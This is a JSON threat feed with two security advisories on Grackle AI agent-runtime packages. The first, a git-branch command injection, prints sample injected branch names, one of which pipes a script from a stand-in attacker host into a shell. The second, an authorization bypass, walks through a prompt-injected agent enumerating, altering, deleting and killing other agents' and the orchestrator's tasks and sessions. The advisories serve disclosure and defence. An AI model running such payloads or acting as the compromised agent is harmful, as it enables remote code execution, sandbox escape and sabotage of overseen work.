{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata. Fed continuously.","feed_url":"https://feed.craftedsignal.io/vendors/grackle-ai/feed.json","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cpes":[],"_cs_cves":[],"_cs_exploited":false,"_cs_has_poc":false,"_cs_poc_references":[],"_cs_products":["@grackle-ai/runtime-sdk (\u003c= 0.132.1)","@grackle-ai/powerline (\u003c= 0.132.1)"],"_cs_severities":["high"],"_cs_tags":["command-injection","rce","supply-chain","nodejs","git"],"_cs_type":"advisory","_cs_vendors":["Grackle AI"],"content_html":"\u003cp\u003eA critical command injection vulnerability (GHSA-vv65-f55v-xm6g) affects Grackle AI's \u003ccode\u003e@grackle-ai/runtime-sdk\u003c/code\u003e and \u003ccode\u003e@grackle-ai/powerline\u003c/code\u003e components, specifically versions \u003ccode\u003e0.132.1\u003c/code\u003e and earlier. The flaw stems from the \u003ccode\u003eNODE_GIT_EXECUTOR\u003c/code\u003e utilizing \u003ccode\u003eshell:true\u003c/code\u003e when executing \u003ccode\u003egit worktree\u003c/code\u003e operations, combined with the unsanitized \u003ccode\u003ebranch\u003c/code\u003e name flowing from the \u003ccode\u003eSpawnSession\u003c/code\u003e gRPC request into the command arguments. This allows a malicious or compromised agent, or any client able to initiate a task via the \u003ccode\u003eSpawnSession\u003c/code\u003e RPC, to inject arbitrary shell commands. These commands are then executed with the privileges of the PowerLine user on provisioned environments, including SSH hosts, Docker containers, and Codespaces, effectively enabling remote code execution and escaping the agent's sandbox. A secondary, less impactful, argument injection vulnerability also exists due to a missing \u003ccode\u003e--\u003c/code\u003e separator.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains the ability to make calls to the PowerLine \u003ccode\u003eSpawnSession\u003c/code\u003e gRPC RPC. This could be through a compromised agent within the victim's environment, a malicious internal actor, or by exploiting another external vulnerability that exposes this RPC.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a Git branch name containing shell metacharacters and arbitrary commands, for example, \u003ccode\u003ex;curl http://attacker/x.sh|sh;#\u003c/code\u003e or \u003ccode\u003e$(touch /tmp/pwned)\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker sends a \u003ccode\u003eSpawnSession\u003c/code\u003e gRPC request to the PowerLine server, providing the crafted malicious branch name as a parameter within the request payload.\u003c/li\u003e\n\u003cli\u003eThe vulnerable \u003ccode\u003eensureWorktree\u003c/code\u003e function, located in \u003ccode\u003epackages/runtime-sdk/src/worktree.ts\u003c/code\u003e, prepares to execute a \u003ccode\u003egit worktree add\u003c/code\u003e command using the \u003ccode\u003eNODE_GIT_EXECUTOR.exec\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eDue to the \u003ccode\u003eshell:true\u003c/code\u003e option being implicitly passed to \u003ccode\u003eNODE_GIT_EXECUTOR.exec\u003c/code\u003e, Node.js concatenates the \u003ccode\u003egit\u003c/code\u003e command and its arguments (including the malicious branch name) into a single string.\u003c/li\u003e\n\u003cli\u003eThis concatenated string is then passed to \u003ccode\u003esh -c\u003c/code\u003e, which interprets the shell metacharacters and executes the attacker's injected commands embedded within the branch name.\u003c/li\u003e\n\u003cli\u003eThe injected commands (e.g., \u003ccode\u003ecurl\u003c/code\u003e to download and execute a malicious script, \u003ccode\u003etouch\u003c/code\u003e for arbitrary file creation) are executed by the \u003ccode\u003esh -c\u003c/code\u003e process with the privileges of the PowerLine user.\u003c/li\u003e\n\u003cli\u003eThe attacker successfully achieves remote code execution, gaining control over the targeted provisioned environment (SSH host, Docker container, or Codespace) as the PowerLine user.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability leads to remote code execution (RCE) with the privileges of the PowerLine user on any provisioned environment where the Grackle AI runtime is deployed. This allows attackers to escape the agent sandbox, gain full control over the affected host (be it an SSH host, Docker container, or Codespace), and potentially access sensitive data, escalate privileges, or establish persistence within the victim's infrastructure. While no specific victim count or targeted sectors are mentioned, any organization utilizing Grackle AI's runtime-sdk in their development or deployment pipelines is at risk.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ePrioritize patching the affected Grackle AI components to address GHSA-vv65-f55v-xm6g by updating \u003ccode\u003e@grackle-ai/runtime-sdk\u003c/code\u003e and \u003ccode\u003e@grackle-ai/powerline\u003c/code\u003e beyond version \u003ccode\u003e0.132.1\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026quot;Detect GHSA-vv65-f55v-xm6g Grackle AI RCE via Git Worktree Injection\u0026quot; to your SIEM and tune for your environment to identify potential exploitation attempts.\u003c/li\u003e\n\u003cli\u003eReview the remediation steps for GHSA-vv65-f55v-xm6g which include removing \u003ccode\u003eshell:true\u003c/code\u003e from \u003ccode\u003eNODE_GIT_EXECUTOR\u003c/code\u003e and adding \u003ccode\u003e--\u003c/code\u003e separators for \u003ccode\u003egit worktree add\u003c/code\u003e invocations.\u003c/li\u003e\n\u003cli\u003eImplement defense-in-depth measures by validating the \u003ccode\u003ebranch\u003c/code\u003e parameter at the gRPC boundary in \u003ccode\u003egrpc-server.ts\u003c/code\u003e to reject names containing shell metacharacters or invalid Git ref rules.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-07-03T11:45:08Z","date_published":"2026-07-03T11:45:08Z","id":"https://feed.craftedsignal.io/briefs/2026-07-grackle-ai-rce/","summary":"A command injection vulnerability (GHSA-vv65-f55v-xm6g) exists in Grackle AI's `@grackle-ai/runtime-sdk` and `@grackle-ai/powerline` components, allowing an attacker to achieve remote code execution as the PowerLine user on provisioned environments by injecting commands into unsanitized Git task branch names via the `SpawnSession` RPC.","title":"Grackle AI Runtime-SDK RCE via Git Worktree Command Injection","url":"https://feed.craftedsignal.io/briefs/2026-07-grackle-ai-rce/"},{"_cs_actors":[],"_cs_cpes":[],"_cs_cves":[],"_cs_exploited":false,"_cs_has_poc":false,"_cs_poc_references":[],"_cs_products":["@grackle-ai/mcp (\u003c= 0.132.1)","@grackle-ai/plugin-core (\u003c= 0.132.1)","@grackle-ai/auth (\u003c= 0.132.1)"],"_cs_severities":["high"],"_cs_tags":["idor","authorization-bypass","privilege-escalation","denial-of-service","code-vulnerability","software-component"],"_cs_type":"advisory","_cs_vendors":["Grackle AI"],"content_html":"\u003cp\u003eGrackle AI's Multi-Agent Collaboration Protocol (MCP) tool layer, including \u003ccode\u003e@grackle-ai/mcp\u003c/code\u003e, \u003ccode\u003e@grackle-ai/plugin-core\u003c/code\u003e, and \u003ccode\u003e@grackle-ai/auth\u003c/code\u003e up to version \u003ccode\u003e0.132.1\u003c/code\u003e, contains critical authorization bypass vulnerabilities (GHSA-f9ff-5x35-7gfw). The core issue stems from inconsistent inline authorization checks within the tool layer, which is the \u003cem\u003esole\u003c/em\u003e authorization boundary for scoped callers. Because the MCP server authenticates all outbound gRPC with a full server API key and backend gRPC handlers perform no caller-based authorization, several mutating tools (\u003ccode\u003etask_update\u003c/code\u003e, \u003ccode\u003etask_delete\u003c/code\u003e, \u003ccode\u003etask_resume\u003c/code\u003e, \u003ccode\u003esession_kill\u003c/code\u003e, \u003ccode\u003esession_resume\u003c/code\u003e) silently omit necessary ancestry/workspace checks, effectively \u0026quot;failing open.\u0026quot; This allows a malicious or prompt-injected scoped agent to perform unauthorized cross-task and cross-session operations, enabling IDOR, privilege escalation, and denial of service. Additionally, a flaw in handling workspaceless sessions allows for cross-workspace read-only data disclosure. The vulnerability was published on July 2, 2026.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003eInitial Access/Compromise\u003c/strong\u003e: An attacker gains control over an existing Grackle AI \u0026quot;scoped agent\u0026quot; within a customer environment, potentially through prompt injection, misconfiguration, or compromising the underlying system hosting the agent.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eTask ID Enumeration (F2)\u003c/strong\u003e: The compromised scoped agent leverages legitimate tools like \u003ccode\u003etask_list\u003c/code\u003e or \u003ccode\u003etask_search\u003c/code\u003e to discover \u003ccode\u003etaskId\u003c/code\u003e values belonging to other tasks, including those of sibling agents, parent tasks, or tasks in different workspaces.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eCross-Workspace Discovery (F7)\u003c/strong\u003e: If the compromised agent operates from a workspaceless session, it exploits the \u003ccode\u003eworkspaceId: undefined\u003c/code\u003e bypass in \u003ccode\u003emcp-server.ts\u003c/code\u003e to call \u003ccode\u003etask_list\u003c/code\u003e (without arguments) and retrieve information about \u003cem\u003eall\u003c/em\u003e tasks across \u003cem\u003eall\u003c/em\u003e workspaces within the Grackle AI instance.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eUnauthorized Data Disclosure (F7)\u003c/strong\u003e: Using the enumerated \u003ccode\u003etaskId\u003c/code\u003e values, the agent then calls \u003ccode\u003etask_show {taskId}\u003c/code\u003e or \u003ccode\u003eschedule_show\u003c/code\u003e to access and potentially exfiltrate sensitive details (e.g., title, description, branch, review notes) from tasks it is not authorized to view across workspaces.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eTask Data Manipulation/Destruction (F2)\u003c/strong\u003e: The agent invokes \u003ccode\u003etask_update\u003c/code\u003e, \u003ccode\u003etask_delete\u003c/code\u003e, or \u003ccode\u003etask_resume\u003c/code\u003e with arbitrary \u003ccode\u003etaskId\u003c/code\u003e values (bypassing ancestry checks), allowing it to modify (e.g., change status to \u003ccode\u003ecomplete\u003c/code\u003e/\u003ccode\u003efailed\u003c/code\u003e, rewrite dependency DAG/budgets) or permanently delete tasks belonging to other agents or the human orchestrator.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eSession Denial of Service / Hijacking (F6)\u003c/strong\u003e: The agent calls \u003ccode\u003esession_kill {sessionId}\u003c/code\u003e or \u003ccode\u003esession_resume {sessionId}\u003c/code\u003e (bypassing ancestry checks) to terminate or resume active sessions of other agents or the root orchestrator, leading to a denial of service or unauthorized session control.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe vulnerabilities allow a compromised Grackle AI scoped agent to escalate privileges, gain unauthorized access to sensitive data, and disrupt operations. Specifically, attackers can permanently destroy other agents' or the human orchestrator's work, corrupt task dependency graphs and budgets, terminate other active sessions (leading to a denial of service for sibling agents or the root orchestrator), hijack foreign sessions, and exfiltrate sensitive task metadata (titles, descriptions, branch info, review notes) from any workspace. The \u0026quot;fail-open\u0026quot; nature means new tools can introduce similar vulnerabilities if ancestry checks are omitted, making the system inherently fragile. The advisory covers systemic findings F2, F6, F7, and F12.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ePrioritize updating all \u003ccode\u003e@grackle-ai/mcp\u003c/code\u003e, \u003ccode\u003e@grackle-ai/plugin-core\u003c/code\u003e, and \u003ccode\u003e@grackle-ai/auth\u003c/code\u003e packages to versions \u003cem\u003egreater than\u003c/em\u003e \u003ccode\u003e0.132.1\u003c/code\u003e to address GHSA-f9ff-5x35-7gfw.\u003c/li\u003e\n\u003cli\u003eEnsure that the remediation for GHSA-f9ff-5x35-7gfw, specifically the enforcement of scope centrally in the \u003ccode\u003eCallToolRequest\u003c/code\u003e dispatcher (\u003ccode\u003emcp-server.ts\u003c/code\u003e) via \u003ccode\u003etargetTaskIdArg\u003c/code\u003e / \u003ccode\u003etargetSessionIdArg\u003c/code\u003e descriptors, is fully implemented and operational.\u003c/li\u003e\n\u003cli\u003eVerify that \u003ccode\u003eassertCallerIsAncestor\u003c/code\u003e or equivalent self-or-ancestor checks have been added to \u003ccode\u003etask_update\u003c/code\u003e, \u003ccode\u003etask_delete\u003c/code\u003e, \u003ccode\u003etask_resume\u003c/code\u003e, \u003ccode\u003esession_kill\u003c/code\u003e, and \u003ccode\u003esession_resume\u003c/code\u003e as described in the remediation for GHSA-f9ff-5x35-7gfw.\u003c/li\u003e\n\u003cli\u003eConfirm that the fix for F7, preventing failure-open on empty \u003ccode\u003eworkspaceId\u003c/code\u003e and applying \u003ccode\u003etask_show\u003c/code\u003e membership checks for all scoped non-root callers, is properly deployed per GHSA-f9ff-5x35-7gfw.\u003c/li\u003e\n\u003cli\u003eIf \u003ccode\u003escoped-token.ts\u003c/code\u003e (F12) is wired into task-abort/stop flows with SQLite-backed persistence, ensure this feature is functional to allow for proper scoped token revocation, as recommended in GHSA-f9ff-5x35-7gfw.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-07-03T11:35:34Z","date_published":"2026-07-03T11:35:34Z","id":"https://feed.craftedsignal.io/briefs/2026-07-grackle-ai-mcp-idor/","summary":"The Grackle AI MCP tool layer, specifically versions of `@grackle-ai/mcp`, `@grackle-ai/plugin-core`, and `@grackle-ai/auth` up to `0.132.1`, suffers from an authorization bypass (IDOR) due to inconsistent inline checks, allowing a compromised scoped agent to perform unauthorized cross-task and cross-session operations, leading to data manipulation, denial of service, and sensitive data disclosure across workspaces.","title":"Grackle AI MCP Tool Layer Fail-Open Authorization Leads to IDOR and Privilege Escalation (GHSA-f9ff-5x35-7gfw)","url":"https://feed.craftedsignal.io/briefs/2026-07-grackle-ai-mcp-idor/"}],"language":"en","title":"CraftedSignal Threat Feed - Grackle AI","version":"https://jsonfeed.org/version/1.1"}